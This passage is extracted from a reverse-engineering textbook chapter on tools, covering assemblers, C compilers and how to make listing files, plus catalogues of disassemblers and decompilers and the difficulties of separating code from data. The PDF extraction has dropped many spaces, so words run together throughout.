bly can often be just as simple. Assembly instructions
and machine code words have a one-to-one correspon-
dence,soeachmachinecodewordwillexactlymaptoone
assembly instruction. However, disassembly has some
other difficulties which cannot be accounted for using
simplecode-wordlookups. Wewillintroduceassemblers
here,andtalkaboutdisassemblylater.
1.1.2 AssemblerConcepts
Assemblers,onamostbasiclevel,translateassemblyin-
structions into machine code with a one to one corre-
spondence. Theycanalsotranslatenamedvariablesinto
hard-codedmemoryaddressesandlabelsintotheirrela-
tivecodeaddresses.
Assemblers, in general, do not perform code optimiza-
tion. The machine code that comes out of an assembler
isequivalenttotheassemblyinstructionsthatgointothe
assembler. Someassemblershavehigh-levelcapabilities
intheformof Macros.
Some information about the program is lost during the
assembly process. First and foremost, program data is
storedinthesamerawbinaryformatasthemachinecode
instructions. This means that it can be difficult to deter-
minewhichpartsoftheprogramareactuallyinstructions.
Notice that you can disassemble raw data, but the resul-
tant assembly code will be nonsensical. Second, textual
information from the assembly source code file, such as
variablenames, labelnames, andcodecommentsareall
destroyed during assembly. When you disassemble thecode, the instructions will be the same, but all the other
helpful information will be lost. The code will be accu-
rate,butmoredifficulttoread.
Compilers,aswewillseelater,causeevenmoreinforma-
tion to be lost, and decompiling is often so difficult and
convoluted as to become nearly impossible to do accu-
rately.
1.1.3 IntelSyntaxAssemblers
Because of the pervasiveness of Intel-based IA-32 mi-
croprocessors in the home PC market, the majority of
assemblyworkdone(andthemajorityofassemblywork
considered in this wikibook) is x86-based. Many of
these assemblers (or new versions of them) can handle
amd64/x86_64/EMT64codeaswell,althoughthiswiki-
bookwillfocusprimarilyon32bit(x86/IA-32)codeex-
amples.
MASM
MASM is Microsoft’s assembler, an abbreviation for
“Macro Assembler.” However, many people use it as an
acronym for “Microsoft Assembler,” and the difference
isn'taproblematall. MASMhasapowerfulmacrofea-
ture,andiscapableofwritingverylow-levelsyntax,and
pseudo-high-level code with its macro feature. MASM
6.15 is currently available as a free-download from Mi-
crosoft,andMASM7.xxiscurrentlyavailableaspartof
theMicrosoftplatformDDK.
MASMusesIntelSyntax.
MASM is used by Microsoft to implement some
low-level portions of its Windows Operating sys-
tems.
MASM,contrarytopopularbelief,hasbeenincon-
stantdevelopmentsince1980,andisupgradedona
needs-basis.
MASM has always been made compatible by Mi-
crosoft to the current platform, and executable file
types.
4
1.1. ASSEMBLERS AND COMPILERS 5
MASM currently supports all Intel instruction sets,
includingSSE2.
ManyusersloveMASM,butmanymorestilldislikethe
factthatitisn'tportabletoothersystems.
TASM
TASM, Borland’s “Turbo Assembler,” is a functional
assembler from Borland that integrates seamlessly with
Borland’sothersoftware developmenttools. Currentre-
leaseversionisversion5.0. TASMsyntaxisverysimilar
toMASM,althoughithasan“IDEAL”modethatmany
usersprefer. TASMisnotfree.
NASM
NASM, the “Netwide Assembler,” is a free, portable,
and retargetable assembler that works on both Windows
and Linux. It supports a variety of Windows and Linux
executable file formats, and even outputs pure binary.
NASM is not as “mature” as either MASM or TASM,
butis:
moreportablethanMASM
cheaperthanTASM
strivestobeveryuser-friendly
NASM comes with its own disassembler ndisasm, and
supports64-bit(x86-64/x64/AMD64/Intel64)CPUs.
NASMisreleasedundertheLGPL.
FASM
FASM,the“FlatAssembler”isanopensourceassembler
thatsupportsx86,andIA-64Intelarchitectures.
1.1.4 (x86)AT&TSyntaxAssemblers
AT&T syntax for x86 microprocessor assembly code is
notascommonasIntel-syntax,buttheGNUAssembler
(GAS)usesit,anditisthe de factoassemblystandardon
UnixandUnix-likeoperatingsystems.
GAS
TheGNU Assembler (GAS) is the default back-end to
the GNU Compiler Collection (GCC) suite. As such,
GASisasportableandretargetableasGCCis. However,
GASusestheAT&Tsyntaxforitsinstructionsasdefault,
whichsomeusersfindtobelessreadablethanIntelsyn-
tax. NewerversionsofgascanbeswitchedtoIntelsyntax
withthedirective".intel_syntaxnoprefix”.GAS is developed specifically to be used as the GCC
backend. BecauseGCCalwaysfeedsitsyntacticallycor-
rectcode,GASoftenhasminimalerrorchecking.
GASisavailableasapartofeithertheGCCpackageor
theGNUbinutilspackage.
1.1.5 OtherAssemblers
HLA
HLA, short for “High Level Assembler” is a project
spearheaded by Randall Hyde to create an assembler
with high-level syntax. HLA works as a front-end to
other assemblers such as FASM (the default), MASM,
NASM, and GAS. HLA supports “common” assembly
language instructions, but also implements a series of
higher-levelconstructssuchasloops,if-then-elsebranch-
ing,andfunctions. HLAcomescompletewithacompre-
hensivestandardlibrary.
Since HLA works as a front-end to another assembler,
theprogrammermusthaveanotherassemblerinstalledto
assemble programs with HLA. HLA code output there-
fore,isasgoodastheunderlyingassembler,butthecode
ismucheasiertowriteforthedeveloper. Thehigh-level
components of HLA may make programs less efficient,
butthatcostisoftenfaroutweighedbytheeaseofwrit-
ing the code. HLA high-level syntax is very similar in
manyrespectstoPascal,whichinturnisitselfsimilarin
manyrespectstoC,somanyhigh-levelprogrammerswill
immediatelypickupmanyoftheaspectsofHLA.
HereisanexampleofsomeHLAcode:
mov(src, dest); // C++ style comments pop(eax);
push(ebp); for(mov(0, ecx); ecx < 10; inc(ecx)) do
mul(ecx);endfor;
Some disassemblers and debuggers can disassemble bi-
narycodeintoHLA-format,althoughnonecanfaithfully
recreatetheHLAmacros.
1.1.6 Compilers
Acompileris a program that converts instructions from
one language into equivalent instructions in another lan-
guage. There is a common misconception that a com-
piler always directly converts a high level language into
machine language, but this isn't always the case. Many
compilers convert code into assembly language, and a
fewevenconvertcodefromonehighlevellanguageinto
another. Common examples of compiled languages are:
C/C++,Fortran,Ada,andVisualBasic. Thefigurebelow
showsthecommoncompile-timestepstobuildingapro-
gramusingtheCprogramminglanguage. Thecompiler
produces object files which are linked to form the final
executable:
6 CHAPTER 1. TOOLS
Forthepurposesofthisbook, wewillonlybeconsider-
ing the case of a compiler that converts C or C++ into
assembly code or machine language. Some compilers,
such as the Microsoft C compiler, compile C and C++
source code directly into machine code. GCC on the
otherhandcompilesCandC++intoassemblylanguage,
and an assembler is used to convert that into the appro-
priatemachinecode. Fromthestandpointofadisassem-
bler,itdoesnotmatterexactlyhowtheoriginalprogram
wascreated. Noticealsothatitisnotpossibletoexactly
reproduce the C or C++ code used originally to create
anexecutable. Itis,however,possibletocreatecodethat
compilesidentically,orcodethatperformsthesametask.
Clanguagestatementsdonotshareaonetoonerelation-
shipwithassemblylanguage. Considerthatthefollowing
C statements will typically all compile into the same as-
semblylanguagecode:
*arrayA = arrayB[x++]; *arrayA = arrayB[x]; x++;
arrayA[0]=arrayB[x++];arrayA[0]=arrayB[x];x++;
Also,considerhowthefollowingloopconstructsperform
identical tasks, and are likely to produce similar or even
identicalassemblylanguagecode:
for(;;){... }while(1){... }do{... }while(1)
1.1.7 CommonC/C++Compilers
The purpose of this section is to list some of the most
common C and C++compilers in use for developing
production-level software. TherearemanymanyCcom-
pilers in the world, but the reverserdoesn't need to con-
sider all cases, especially when looking at professional
software. Thispagewilldiscusseachcompiler’sstrengths
and weaknesses, its availability (download sites or cost
information), and it will also discuss how to generate an
assemblylistingfilefromeachcompiler.
MicrosoftCCompiler
TheMicrosoftCcompilerisavailablefromMicrosoftfor
free as part of the Windows Server 2003 SDK. It is the
samecompilerandlibraryasisusedinMSVisualStudio,
butdoesn'tcomewiththefancyIDE.TheMSCCompiler
has a very good optimizing engine. It compiles C andC++,andhastheoptiontocompileC++codeintoMSIL
(the.NETbytecode).
Microsoft’s compiler only supports Windows systems,
andIntel-compatible16/32/64bitarchitectures.
The Microsoft C compiler is cl.exeand the linker is
link.exe
Listing Files In this wikibook, cl.exe is frequently
used to produce assembly listing files of C source code.
Toproduceanassemblylistingfileyourself,usethesyn-
tax:
cl.exe/Fa<assemblyfilename><Csourcefile>
The"/Fa”switchisthecommand-lineoptionthattellsthe
compilertoproduceanassemblylistingfile.
Forexample,thefollowingcommandline:
cl.exe/FaTest.asmTest.c
wouldproduceanassemblylistingfilenamed“Test.asm”
from the C source file “Test.c”. Notice that there is no
spacebetweenthe/Faswitchandthenameoftheoutput
file.
GNUCCompiler
TheGNUCcompilerispartoftheGNUCompilerCol-
lection (GCC) suite. This compiler is available for most
systems and it is free software. Many people use it ex-
clusively so that they can support many platforms with
just one compiler to deal with. The GNU GCC Com-
pileristhe de factostandardcompilerforLinuxandUnix
systems. It is retargetable, allowing for many input lan-
guages (C, C++, Obj-C, Ada, Fortran, etc...), and sup-
porting multiple target OSes and architectures. It opti-
mizeswell,buthasanon-aggressiveIA-32codegenera-
tionengine.
TheGCCfrontendprogramis“gcc”(“gcc.exe”onWin-
dows)andtheassociatedlinkeris“ld”(“ld.exe”onWin-
dows). Windows cmd searches for the programs with
“.exe”extensionsautomatically,soyoudon'tneedtotype
thefilenameextension.
Listing Files To produce an assembly listing file in
GCC,usethefollowingcommandlinesyntax:
gcc-S/path/to/sourcefile.c
Forexample,thefollowingcommandline:
gcc-Stest.c
willproduceanassemblylistingfilenamed“test.s”. As-
semblylistingfilesgeneratedbyGCCwillbeinGASfor-
mat. Onx86youcanselectthesyntaxwith-masm=intel
or-masm=att. GCClistingfilesarefrequentlynotaswell
commentedandlaid-outasarethelistingfilesforcl.exe.
You may add `-g3` flags to enable source-code-level de-
1.2. DISASSEMBLERS AND DECOMPILERS 7
bugging symbols so you can see the line numbers in the
listing. The -fno-asynchronous-unwind-tables flag can
helpeliminatesomemacrosinthelisting.
IntelCCompiler
This compiler is used only for x86, x86-64, and IA-64
code. It is available for both Windows and Linux. The
IntelCcompilerwaswrittenbythepeoplewhoinvented
the original x86 architecture: Intel. Intel’s development
tools generate code that is tuned to run on Intel micro-
processors,andisintendedtosqueezeeverylastounceof
speedfromanapplication. AMDIA-32compatiblepro-
cessors are not guaranteed to get the same speed boosts
becausetheyhavedifferentinternalarchitectures.
MetrowerksCodeWarrior
Thiscompiler iscommonly used for classicMacOS and
for embedded systems. If you try to reverse-engineer a
piece of consumer electronics, you may encounter code
generatedbyMetrowerksCodeWarrior.
GreenHillsSoftwareCompiler
Thiscompileriscommonlyusedforembeddedsystems.
If you attempt to reverse-engineer a piece of consumer
electronics,youmayencountercodegeneratedbyGreen
HillsC/C++.
1.2 Disassemblers and Decompil-
ers
1.2.1 WhatisaDisassembler?
In essence, a disassembler is the exact opposite of an
assembler. Whereanassemblerconvertscodewrittenin
anassemblylanguageintobinarymachinecode,adisas-
semblerreversestheprocessandattemptstorecreatethe
assemblycodefromthebinarymachinecode.
Since most assembly languages have a one-to-one cor-
respondence with underlying machine instructions, the
processofdisassemblyisrelativelystraight-forward,and
a basic disassembler can often be implemented simply
by reading in bytes, and performing a table lookup. Of
course,disassemblyhasitsownproblemsandpitfalls,and
theyarecoveredlaterinthischapter.
Many disassemblers have the option to output assembly
language instructions in Intel, AT&T, or (occasionally)
HLA syntax. Examples in this book will use Intel and
AT&Tsyntaxinterchangeably. WewilltypicallynotuseHLA syntax for code examples, but that may change in
thefuture.
1.2.2 x86Disassemblers
Here we are going to list some commonly available dis-
assembler tools. Notice that there are professional dis-
assemblers (which cost money for a license) and there
are freeware/shareware disassemblers. Each disassem-
bler will have different features, so it is up to you as the
readertodeterminewhichtoolsyouprefertouse.
OnlineDisassemblers
ODAisafree,web-baseddisassemblerforawidevari-
etyofarchitectures. Youcanuse“LiveView”tosee
how code is disassembled in real time, one byte at
atime,oruploadafile. Thesiteiscurrentlyinbeta
releasebutwillhopefullyonlygetbetterwithtime.
http://www.onlinedisassembler.com
CommercialWindowsDisassemblers
IDAProisaprofessionaldisassemblerthatisexpensive,
extremely powerful, and has a whole slew of fea-
tures. ThedownsidetoIDAProisthatitcosts$515
USforthestandardsingle-useredition. Assuchthis
wikibookwillnotconsiderIDAProspecificallybe-
cause the price tag is exclusionary. Freeware ver-
sionsdoexist;seebelow.
(version6.x) http://www.hex-rays.com/idapro/
Relyzeisasoftwareanalysistoolthatletsyoureverseen-
gineerandanalyzenativex86,x64andARMWin-
dows and Linux software. It provides interactive
code, structure and call graph views as well as in-
teractive binary diffing. Plugin support is offered
throughanembeddedRubypluginframework.
https://www.relyze.com
HopperDisassembler is a reverse engineering tool for
the Mac, that lets you disassemble, decompile and
debug 32/64bits Intel Mac executables. It can also
disassembleanddecompileWindowsexecutables.
http://www.hopperapp.com
OBJ2ASM is an object file disassembler for 16 and 32
bit x86 object files in Intel OMF, Microsoft COFF
format,LinuxELForMacOSXMach-Oformat.
http://www.digitalmars.com/ctg/obj2asm.html
8 CHAPTER 1. TOOLS
PEExplorer is a disassembler that “focuses on ease of
use, clarity and navigation.” It isn't as feature-filled
asIDAProandcarriesasmallerpricetagtooffset
themissingfunctionality: $130
http://www.heaventools.com/PE_Explorer_
disassembler.htm
W32DASM W32DASMwasanexcellent16/32bitdis-
assemblerforWindows,itseemsitisnolongerde-
veloped. the latest version available is from 2003.
thewebsitewentdownandnoreplacementwentup.
http://www.softpedia.com/get/Programming/
Debuggers-Decompilers-Dissasemblers/WDASM.
shtml
BinaryNinja Binary Ninja is a commercial, cross-
platform (Linux, OS X, Windows) reverse en-
gineering platform with aims to offer a sim-
ilar feature set to IDA at a much cheaper
price point. A precursor written in python is
open source and available at https://github.com/
Vector35/deprecated-binaryninja-python . Intro-
ductory pricing is $99 for student/non-commercial
use,and$399forcommercialuse.
https://binary.ninja/
Commercial Freeware/Shareware Windows Disas-
semblers
OllyDbgOllyDbgisoneofthemostpopulardisassem-
blersrecently. Ithasalargecommunityandawide
variety of plugins available. It emphasizes binary
code analysis. Supports x86 instructions only (no
x86_64supportfornow,althoughitisontheway).
http://www.ollydbg.de/ (officialwebsite)
http://www.openrce.org/downloads/browse/OllyDbg_
Plugins(plugins)
http://www.ollydbg.de/odbg64.html (64bitversion)
FreeWindowsDisassemblers
Capstone Capstone is an open source disassembly
framework for multi-arch (including support for
x86, x86_64)&multi-platformwithadvancedfea-
tures.
http://www.capstone-engine.org/
ObjconvA command line disassembler supporting 16,
32, and 64 bit x86 code. Latest instruction set
(SSE4, AVX, XOP, FMA, etc.), several object file
formats, several assembly syntax dialects. Win-
dows,Linux,BSD,Mac. Intelligentanalysis.http://www.agner.org/optimize/#objconv
IDA3.7A DOS GUI tool that behaves very much like
IDA Pro, but is considerably more limited. It can
disassemblecodefortheZ80,6502,Intel8051,In-
teli860,andPDP-11processors,aswellasx86in-
structionsuptothe486.
http://www.simtel.net/product.php (search for
ida37fw)
IDAProFreeware Behaves almost exactly like IDA
Pro,butdisassemblesonlyIntelx86opcodesandis
Windows-only. It can disassemble instructions for
thoseprocessorsavailableasof2003. Freefornon-
commercialuse.
(version4.1) http://www.themel.com/idafree.zip
(version 4.3) http://www.datarescue.be/
idafreeware/freeida43.exe
(version 5.0) http://www.hex-rays.com/idapro/
idadownfreeware.htm
BORGDisassembler BORG is an excellent Win32
DisassemblerwithGUI.
http://www.caesum.com/
HTEditor An analyzing disassembler for Intel x86 in-
structions. ThelatestversionrunsasaconsoleGUI
program on Windows, but there are versions com-
piledforLinuxaswell.
http://hte.sourceforge.net/
diStorm64 diStormisanopensourcehighlyoptimized
streamdisassemblerlibraryfor80x86andAMD64.
http://ragestorm.net/distorm/
crudasmcrudasm is an open source disassembler with
a variety of options. It is a work in progress and is
bundledwithapartialdecompiler.
http://sourceforge.net/projects/crudasm9/
BeaEngine BeaEngine is a complete disassembler li-
brary for IA-32 and intel64 architectures (coded
in C and usable in various languages : C, Python,
Delphi, PureBasic, WinDev, masm, fasm, nasm,
GoAsm).
http://www.beaengine.org
VisualDuxDebugger isa64-bitdebuggerdisassembler
forWindows.
1.2. DISASSEMBLERS AND DECOMPILERS 9
http://www.duxcore.com/products.html
BugDbgis a 64-bit user-land debugger designed to de-
bugnative64-bitapplicationsonWindows.
http://www.pespin.com/
DSMHELP Disassemble Help Library is a disas-
sembler library with single line Epimorphic
assembler. Supported instruction sets - Ba-
sic,System,SSE,SSE2,SSE3,SSSE3,SSE4,SSE4A,MMX,FPU,3DNOW,VMX,SVM,AVX,AVX2,BMI1,BMI2,F16C,FMA3,FMA4,XOP.
http://dsmhelp.narod.ru/ (inRussian)
ArkDasm is a 64-bit interactive disassembler and de-
buggerforWindows. Supportedprocessor: x64ar-
chitecture(Intelx64andAMD64)
http://www.arkdasm.com/
SharpDisam is a C# port of the udis86 x86 / x86-64
disassembler
http://sharpdisasm.codeplex.com/
UnixDisassemblers
Many of the Unix disassemblers, especially the open
source ones, have been ported to other platforms, like
Windows(mostlyusing MinGWorCygwin). SomeDis-
assemblerslikeotool( OSX)aredistro-specific.
Capstone Capstone is an open source disassembly
framework for multi-arch (including support for
x86, x86_64) & multi-platform (including Mac
OSX,Linux,*BSD,Android,iOS,Solaris)withad-
vancedfeatures.
http://www.capstone-engine.org/
BastardDisassembler The Bastard disassembler is a
powerful, scriptable disassembler for Linux and
FreeBSD.
http://bastard.sourceforge.net/
ndisasmNASM’s disassembler for x86 and x86-64.
Works on DOS, Windows, Linux, Mac OS X and
variousothersystems.
udis86DisassemblerLibraryforx86andx86-64
http://udis86.sourceforge.net/
ZyanDisassemblerEngine(Zydis) Fast and
lightweightx86/x86-64disassemblerlibrary.
https://github.com/zyantific/zyan-disassembler-engineObjconvSeeabove.
ciasdisThe official name of ciasdis is com-
puter_intelligence_assembler_disassembler . This
Forth-based tool allows to incrementally and
interactively build knowledge about a code body.
It is unique that all disassembled code can be
re-assembled to the exact same code. Processors
are 8080, 6809, 8086, 80386, Pentium I en DEC
Alpha. AscriptingfacilityaidsinanalyzingElfand
MSDOS headers and makes this tool extendable.
ThePentiumIciasdisisavailableasabinaryimage,
othersareinsourceform,loadableontolinaForth,
availablefromthesamesite.
http://home.hccnet.nl/a.w.m.van.der.horst/ciasdis.html
objdump comesstandard,andistypicallyusedforgen-
eralinspectionofbinaries. Payattentiontotherelo-
cationoptionandthedynamicsymboltableoption.
gdbcomes standard, as a debugger, but is very often
used for disassembly. If you have loose hex dump
data that you wish to disassemble, simply enter it
(interactively) over top of something else or com-
pileitintoaprogramasastringlikeso: charfoo[]
={0x90,0xcd,0x80,0x90,0xcc,0xf1,0x90};
lidalinuxinteractivedisassembler an interactive dis-
assemblerwithsomespecialfunctionslikeacrypto
analyzer. Displaysstringdatareferences,doescode
flow analysis, and does not rely on objdump. Uti-
lizes the Bastard disassembly library for decoding
singleopcodes. Theprojectwasstartedin2004and
remainsdormanttothisday.
http://lida.sourceforge.net
dissyThis program is a interactive disassembler that
usesobjdump.
http://code.google.com/p/dissy/
EmilPRO replacement for the deprecated dissy disas-
sembler.
http://github.com/SimonKagstrom/emilpro
x86disThis program can be used to display binary
streamssuchasthebootsectororotherunstructured
binaryfiles.
ldasmLDasm(LinuxDisassembler)isaPerl/Tk-based
GUI for objdump/binutils that tries to imitate the
'look and feel' of W32Dasm. It searches for cross-
references (e.g. strings), converts the code from
GAS to a MASM-like style, traces programs and
much more. Comes along with PTrace, a process-
flow-logger. Last updated in 2002, available from
Tucows.
10 CHAPTER 1. TOOLS
http://www.tucows.com/preview/59983/LDasm
llvmLLVMhastwointerfacestoitsdisassembler:
llvm-objdump MimicsGNUobjdump.
llvm-mcSeetheLLVMblog . Exampleusage:
$ echo '1 2' | llvm-mc -disassemble -
triple=x86_64-apple-darwin9
addl%eax,(%rdx)
$echo'0x0f0x10x9'|llvm-mc-disassemble
-triple=x86_64-apple-darwin9
sidt(%rcx)
$ echo '0x0f 0xa2' | llvm-mc -disassemble
-triple=x86_64-apple-darwin9
cpuid
$ echo '0xd9 0xff' | llvm-mc -disassemble
-triple=i386-apple-darwin9
fcos
otoolOSX’sobjectfiledisplayingtool.
edbAcrossplatformx86/x86-64debugger.
https://github.com/eteran/edb-debugger
x64dbgAnopen-sourcex64/x32debuggerforwindows.
http://x64dbg.com
1.2.3 DisassemblerIssues
Aswehavealludedtobefore,thereareanumberofissues
and difficulties associated with the disassembly process.
The two most important difficulties are the division be-
tweencodeanddata,andthelossoftextinformation.
SeparatingCodefromData
Sincedataandinstructionsareallstoredinanexecutable
asbinarydata,theobviousquestionarises: howcanadis-
assembler tell code from data? Is any given byte a vari-
able,orpartofaninstruction?
Theproblemwouldn'tbeasdifficultifdatawerelimited
tothe.datasection(segment)ofanexecutable(explained
inalaterchapter)andifexecutablecodewerelimitedto
the .code section of an executable, but this is often not
thecase. Datamaybeinserteddirectlyintothecodesec-
tion(e.g. jumpaddresstables,constantstrings),andexe-
cutablecodemaybestoredinthedatasection(although
newsystemsareworkingtopreventthisforsecurityrea-
sons). AI programs, LISP or Forth compilers may not
contain .text and .data sections to help decide, and have
codeanddatainterspersedinasinglesectionthatisread-
able, writable and executable, Boot code may even re-
quire substantial effort to identify sections. A techniquethat is often used is to identify the entry point of an ex-
ecutable, and find all code reachable from there, recur-
sively. Thisisknownas“codecrawling”.
Manyinteractivedisassemblerswillgivetheusertheop-
tion to render segments of code as either code or data,
but non-interactive disassemblers will make the separa-
tion automatically. Disassemblers often will provide the
instructionANDthecorrespondinghexdataonthesame
line,shiftingtheburdenfordecisionsaboutthenatureof
the code to the user. Some disassemblers (e.g. ciasdis)
willallowyoutospecifyrulesaboutwhethertodisassem-
bleasdataorcodeandinventlabelnames,basedonthe
contentoftheobjectunderscrutiny. Scriptingyourown
“crawler”inthiswayismoreefficient;forlargeprograms
interactivedisassemblingmaybeimpracticaltothepoint
ofbeingunfeasible.
Thegeneralproblemofseparatingcodefromdatainar-
bitrary executable programs is equivalent to the halting
problem. As a consequence, it is not possible to write
adisassemblerthatwillcorrectlyseparatecodeanddata
for all possible input programs. Reverse engineering is
fullofsuchtheoreticallimitations,althoughby Rice’sthe-
oremall interesting questions about program properties
areundecidable(socompilersandmanyothertoolsthat
deal with programs in any form run into such limits as
well). Inpracticeacombinationofinteractiveandauto-
matic analysis and perseverance can handle all but pro-
grams specifically designed to thwart reverse engineer-
ing,likeusingencryptionanddecryptingcodejustprior
touse,andmovingcodearoundinmemory.
LostInformation
User defined textual identifiers, such as variable names,
label names, and macros are removed by the assembly
process. They may still be present in generated object
files, for use by tools likedebuggers and relocating link-
ers, but the direct connection is lost and re-establishing
thatconnectionrequiresmorethanameredisassembler.
Especiallysmallconstantsmayhavemorethanonepos-
sible name. Operating system calls (like DLLs in MS-
Windows,orsyscallsinUnices)maybereconstructed,as
their names appear in a separate segment or are known
beforehand. Manydisassemblersallowtheusertoattach
anametoalabelorconstantbasedonhisunderstanding
of the code. These identifiers, in addition to comments
in the source file, help to make the code more readable
to a human, and can also shed some clues on the pur-
pose of the code. Without these comments and identi-
fiers,itishardertounderstandthepurposeofthesource
code, and it can be difficult to determine the algorithm
beingusedbythatcode. Whenyoucombinethisproblem
with the possibility that the code you are trying to read
may, in reality, be data (as outlined above), then it can
be even harder to determine what is going on. Another
challengeisposedbymodernoptimisingcompilers;they
inline small subroutines, then combine instructions over
1.2. DISASSEMBLERS AND DECOMPILERS 11
call and return boundaries. This loses valuable informa-
tionaboutthewaytheprogramisstructured.
1.2.4 Decompilers
Akin to Disassembly, Decompilers take the process a
step further and actually try to reproduce the code in a
highlevellanguage. Frequently, thishighlevellanguage
isC,becauseCissimpleandprimitiveenoughtofacili-
tatethedecompilationprocess. Decompilationdoeshave
its drawbacks, because lots of data and readability con-
structs are lost during the original compilation process,
andtheycannotbereproduced. Sincethescienceofde-
compilationisstillyoung,andresultsare“good”butnot
“great”,thispagewilllimititselftoalistingofdecompil-
ers,andageneral(butbrief)discussionofthepossibilities
ofdecompilation.
Decompilation:IsItPossible?
Inthefaceofoptimizingcompilers, itisnotuncommon
to be asked “Is decompilation even possible?" To some
degree, it usually is. Make no mistake, however: an op-
timizing compiler results in the irretrievable loss of in-
formation. An example is in-lining, as explained above,
wherecodecallediscombinedwithitssurroundings,such
thattheplaceswheretheoriginalsubroutineiscalledcan-
not even be identified. An optimizer that reverses that
processiscomparabletoanartificialintelligenceprogram
thatrecreatesapoeminadifferentlanguage. Soperfectly
operationaldecompilersarealongwayoff. Atmost,cur-
rent Decompilers can be used as simply an aid for the
reverseengineeringprocessleavinglotsofarduouswork.
CommonDecompilers
Hex-RaysDecompiler Hex-Rays is a commercial de-
compiler. It is made as an extension to popular
IDA-Pro disassembler. It is currently the only vi-
ablecommerciallyavailabledecompilerwhichpro-
ducesusableresults. Itsupportsbothx86andARM
architecture.
http://www.hex-rays.com/products/decompiler/index.
shtml
DCCDCCislikelyoneoftheoldestdecompilersinex-
istence, dating back over 20 years. It serves as a
good historical and theoretical frame of reference
forthedecompilationprocessingeneral(Mirrors: ).
Asof2015,DCCisan activeproject . Someofthe
latest changes include fixes for longstanding mem-
oryleaksandamoremodernQt5-basedfront-end.
RetDecTheRetargetableDecompilerisafreewareweb
decompilerthattakesinELF/PE/COFFbinariesinIntel x86, ARM, MIPS, PIC32, and PowerPC ar-
chitecturesandoutputsCorPython-likecode,plus
flowchartsandcontrolflowgraphs. Itputsarunning
time limit on each decompilation. It produces nice
resultsinmostcases.
https://retdec.com/
Rekoa modular open-source decompiler supporting
bothaninteractiveGUIandacommand-lineinter-
face. Itspluggabledesignsupportsdecompilationof
avarietyofexecutableformatsandprocessorarchi-
tectures (8- , 16- , 32- and 64-bit architectures as
of2015). Italsosupportsrunningunpackingscripts
beforeactualdecompilation. Itperformsglobaldata
andtypeanalysesofthebinaryandyieldsitsresults
inasubsetofC++.
http://sourceforge.net/projects/decompiler
https://github.com/uxmal/reko
C4Decompiler C4Decompiler is an interactive, static
decompiler under development (Alpha in 2013). It
performs global analysis of the binary and presents
the resulting C source in a Windows GUI. Context
menus support navigation, properties, cross refer-
ences, C/Asm mixed view and manipulation of the
decompilecontext(functionABI).
http://www.c4decompiler.com
BoomerangDecompilerProject Boomerang Decom-
pilerisanattempttomakeapowerful,retargetable
decompiler. So far, it only decompiles into C with
moderatesuccess.
http://boomerang.sourceforge.net/
ReverseEngineeringCompiler(REC) RECisapow-
erful“decompiler”thatdecompilesnativeassembly
codeintoa C-likecoderepresentation. Thecodeis
half-way between assembly and C, but it is much
more readable than the pure assembly is. Unfortu-
natelytheprogramappearstoberatherunstable.
http://www.backerstreet.com/rec/rec.htm
ExeToCExeToC decompiler is an interactive decom-
pilerthatboastedprettygoodresultsinthepast.
http://sourceforge.net/projects/exetoc
snowman Snowman is an open source native code to
C/C++decompiler. SupportsARM,x86,andx86-
64 architectures. ReadsELF, Mach-O,andPE file
formats. Reconstructs functions, their names and
arguments, local and global variables, expressions,
integer, pointer and structural types, all types of
control-flowstructures,includingswitch. Hasanice
12 CHAPTER 1. TOOLS
graphical user interface with one-click navigation
between the assembler code and the reconstructed
program. Has a command-line interface for batch
processing.
https://derevenets.com
1.2.5 AGeneralviewofDisassembling
8bitCPUcode
MostembeddedCPUsare8-bitCPUs.[1]
Normally when a subroutine is finished, it returns to ex-
ecuting the next address immediately following the call
instruction.
However, assembly-language programmers occasionally
useseveraldifferenttechniquesthatadjustthereturnad-
dress,makingdisassemblymoredifficult:
jumptables,
calculatedjumps,and
aparameterafterthecallinstruction.
jump tables and other calculated jumps On 8-bit
CPUs,calculatedjumpsareoftenimplementedbypush-
ingacalculated“return”addresstothestack,thenjump-
ingtothataddressusingthe“return”instruction. Forex-
ample, the RTS Trick uses this technique to implement
jumptables( w:branchtable ).
parameters after the call instruction Instead of
pickinguptheirparametersoffthestackoroutofsome
fixed global address, some subroutines provide parame-
ters in the addresses of memory that follow the instruc-
tionthatcalledthatsubroutine. Subroutinesthatusethis
technique adjust the return address to skip over all the
constantparameterdata,thenreturntoanaddressmany
bytesafterthe“call”instruction. Oneofthemorefamous
programsthatused thistechniqueisthe“Sweet16” vir-
tualmachine.
Thetechniquemaymakedisassemblymoredifficult.
Asimpleexampleofthisisthewrite()procedureimple-
mentedasfollows:
; assume ds = cs, e.g like in boot sector code start: call
write;pushmessage’saddressontopofstackdb“Hello,
world”,0dh,0ah,00h ; return point ret ; back to DOS
write proc near pop si ; get string address mov ah,0eh ;
BIOS:writeteletypew_loop: lodsb; readcharat[ds:si]
and increment si or al,al ; is it 00h? jz short w_exit int
10h ; write the character jmp w_loop ; continue writing
w_exit: jmpsiwriteendpendstartAmacro-assemblerlikeTASMwillthenuseamacrolike
thisone:
_writemacromessagecallwritedbmessagedb0_write
endm
From a human disassembler’s point of view, this is a
nightmare,althoughthisisstraightforwardtoreadinthe
originalAssemblysourcecode,asthereisnowaytode-
cideifthedbshouldbeinterpretedornotfromthebinary
form, and this may contain various jumps to real exe-
cutablecodearea,triggeringanalysisofcodethatshould
neverbeanalysed,andinterferingwiththeanalysisofthe
realcode(e.g. disassemblingtheabovecodefrom0000h
or0001hwon'tgivethesameresultsatall).
However a half-decent tool with possibilities to specifiy
rules,andheuristicmeanstoidentifytextswillhavelittle
trouble.
32bitCPUcode
Most32-bitCPUsusetheARMinstructionset.[1][2][3]
Typical ARM assembly code is a series of subroutines,
withliteralconstantsscatteredbetweensubroutines. The
standard prolog and epilog for subroutines is pretty easy
torecognize.
Abrieflistofdisassemblers
ciasdis“an assembler where the elements opcode,
operands and modifiers are all objects, that are
reusablefordisassembly.”For8080808680386Al-
pha 6809 and should be usable for Pentium 68000
65028051.
radare,thereverseengineeringframework includes
open-source tools to disassemble code for many
processors including x86, ARM, PowerPC, m68k,
etc. several virtual machines including java, msil,
etc.,andformanyplatformsincludingLinux,BSD,
OSX,Windows,iPhoneOS,etc.
IDA, theInteractive Disassembler (IDA Pro) can
disassemblecodeforahugenumberofprocessors,
including ARM Architecture (including Thumb
and Thumb-2), ATMEL AVR, INTEL 8051, IN-
TEL 80x86, MOS Technologies 6502, MC6809,
MC6811, M68H12C, MSP430, PIC 12XX, PIC
14XX,PIC18XX,PIC16XXX,ZilogZ80,etc.
Wikipedia: objdump ,partoftheGNUbinutils,can
disassemble code for several processors and plat-
forms. binutilsisanimportantpartofthetoolchain
asitprovidesthelinker,assemblerandotherutilties
